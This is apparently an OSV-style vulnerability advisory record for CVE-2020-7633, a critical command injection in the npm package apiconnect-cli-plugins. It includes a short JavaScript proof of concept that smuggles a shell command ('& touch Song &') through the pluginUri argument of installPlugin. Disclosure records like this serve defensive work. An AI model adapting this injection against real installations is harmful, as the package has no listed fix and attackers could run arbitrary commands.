{"id":"CVE-2020-7633","aliases":[],"url":"https://o3.security/vulnerability/CVE-2020-7633","summary":"apiconnect-cli-plugins vulnerable to OS Command Injection","details":"apiconnect-cli-plugins through 6.0.1 is vulnerable to Command Injection. It allows execution of arbitrary commands via the `pluginUri` argument.\n\n### PoC\n```js\nvar root = require(\"apiconnect-cli-plugins\");\nvar payload = \"& touch Song &\";\nroot.pluginLoader.installPlugin(payload, \"\");\n```\n\nThe injection point is located in line 181 of file `lib/plugin-loader.js`, in the function `installPlugin(pluginUri, registryUri)`.","published":"2021-05-24T22:18:13Z","modified":"2026-03-14T10:41:05.060914Z","cvss":{"score":9.8,"severity":"CRITICAL","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},"epss":null,"cisaKev":null,"exploitsKnown":null,"affectedPackages":[{"ecosystem":"npm","name":"apiconnect-cli-plugins","fixedVersion":null}],"fix":null,"references":[{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-7633"},{"type":"PACKAGE","url":"https://openbase.com/js/apiconnect-cli-plugins"},{"type":"WEB","url":"https://snyk.io/vuln/SNYK-JS-APICONNECTCLIPLUGINS-564427"},{"type":"WEB","url":"https://web.archive.org/web/20211209115530/https://openbase.com/js/apiconnect-cli-plugins"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-03-14T10:41:05.060914Z"}}